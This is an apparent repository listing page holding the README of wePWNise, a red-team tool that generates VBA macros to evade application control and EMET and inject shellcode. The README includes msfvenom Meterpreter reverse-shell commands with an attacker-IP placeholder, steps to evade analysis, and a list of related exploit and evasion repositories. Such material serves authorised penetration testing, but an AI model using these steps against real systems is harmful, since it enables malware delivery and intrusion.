• Stars
    star
    350
  • Rank 121,229 (Top 3 %)
  • Language
    Python
  • License
    Other
  • Created almost 8 years ago
  • Updated about 6 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.

wePWNise

wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.

Prerequisites

  • Python termcolor package. To install run: pip install termcolor

Command line arguments

To start using wePWNise, first take a look at the options it supports:

usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]   
                   [--out <output_file>] [--msgbox] [--msg <window_message>]

optional arguments:   
  -h, --help            show this help message and exit   
  -i86 <x86_shellcode>  Input x86 raw shellcode   
  -i64 <x64_shellcode>  Input x64 raw shellcode   
  --inject64            Inject into 64 Bit. Set to False when delivering x86   
                        payloads only. Default is True   
  --out <output_file>   File to output the VBA macro to   
  --msgbox              Present messagebox to prevent automated analysis.   
                        Default is True.   
  --msg <window_message>   
                        Custom message to present the victim if --msgbox is   
                        set to True

wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.

Usage examples

The following sections describe some basic usage examples of wePWNise.

Metasploit payloads

First the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt

$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike payloads

To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.

Attacks > Packages > Payload Generator

Enter the generated payloads into wePWNise to generate the VBA code.

$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

Custom payloads

In certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.

$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw  -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt

Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise's -i86 command line paramenter.

License

wePWNise is released under a 3-clause BSD License and maintained by MWR InfoSecurity

Credits

This tool was originally developed by Vincent Yiu (@vysecurity).

More Repositories

1

SharpGPOAbuse

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
C#
1,017
star
2

dref

DNS Rebinding Exploitation Framework
JavaScript
482
star
3

KernelFuzzer

Cross Platform Kernel Fuzzer Framework
C
440
star
4

win_driver_plugin

A tool to help when dealing with Windows IOCTL codes or reversing Windows drivers.
Python
417
star
5

OSXFuzz

macOS Kernel Fuzzer
C
249
star
6

Azurite

Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
PowerShell
247
star
7

Ninjasploit

A meterpreter extension for applying hooks to avoid windows defender memory scans
C
230
star
8

z3_and_angr_binary_analysis_workshop

Code and exercises for a workshop on z3 and angr
Python
209
star
9

SharpClipHistory

SharpClipHistory is a .NET application written in C# that can be used to read the contents of a user's clipboard history in Windows 10 starting from the 1809 Build.
C#
188
star
10

XRulez

A command line tool for creating malicious outlook rules
C
156
star
11

drozer-modules

Python
139
star
12

ViridianFuzzer

Kernel driver to fuzz Hyper-V hypercalls
C++
132
star
13

incognito

One Token To Rule Them All https://labs.mwrinfosecurity.com/blog/incognito-v2-0-released/
C
129
star
14

CVE-2018-4121

macOS 10.13.3 (17D47) Safari Wasm Exploit
JavaScript
120
star
15

GWTMap

Python
90
star
16

CVE-2016-7255

An exploit for CVE-2016-7255 on Windows 7/8/8.1/10(pre-anniversary) 64 bit
C++
84
star
17

N1QLMap

The tool exfiltrates data from Couchbase database by exploiting N1QL injection vulnerabilities.
Python
72
star
18

SharpGPO-RemoteAccessPolicies

A C# tool for enumerating remote access policies through group policy.
C#
71
star
19

defcon25_uac_workshop

UAC 0Day all day!
58
star
20

3d-accelerated-exploitation

3D Accelerated Exploitation
C
55
star
21

Athena

GUI Tool to generate threat intelligence information in various formats
C#
44
star
22

honeypot_recipes

A chef cookbook which can be used to quickly deploy a high interaction honeypot, using the sysdig and falco tools
Ruby
43
star
23

needle-agent

The iOS Agent for the Needle Security Assessment Framework
Objective-C
41
star
24

CalendarPersist

JXA script to allow programmatic persistence via macOS Calendar.app alerts.
JavaScript
41
star
25

coralsun

macOS Cython IOKit Utility Library
Python
40
star
26

avrop

ROP based Movfuscator VM
Assembly
29
star
27

mercury-modules

Extra modules for the Mercury Android Security Assessment Framework.
Python
25
star
28

jASMin

Python
24
star
29

fdpasser

Example of passing file descriptors into a container to perform a privilege escalation on the host
C
23
star
30

tapjacking-poc

Java
23
star
31

fingertec-tool

A tool for communicating with FingerTec access control devices, as well as other ZKTeco based devices
Python
21
star
32

gists

Short handy snippets from the @mwrlabs team
PowerShell
20
star
33

timeinator

Timeinator is an extension for Burp Suite that can be used to perform timing attacks over an unreliable network such as the internet.
Python
20
star
34

weasel

C
19
star
35

veripy

a network-centric compliance testing framework for verifying the operation of network equipment against the RFCs specified in ripe-554
Python
12
star
36

Ellume-COVID-Test_Research-Files

Java
11
star
37

jar-agent

Java
9
star
38

mercury-common

This repository contains Mercury components that are shared between the Agent and the Server/Console.
9
star
39

mwr-tls

A collection of utilities for interacting with SSL and X509 Certificates on Android.
Java
8
star
40

bsides18_breakfree

Example tools and output from BSides 2018 "I Want to Break Free"
Python
7
star
41

Cisco-UCM-SQLi-Scripts

Scripts that can be used to exploit CVE-2019-15972 which was an Authenticated SQLi issue in Cisco Unified Call Manager (UCM).
Python
7
star
42

rogue-agent

Java
5
star
43

ByteConverter

C++
1
star
44

Re-Desk-v2.3-Vulnerabilities

Python
1
star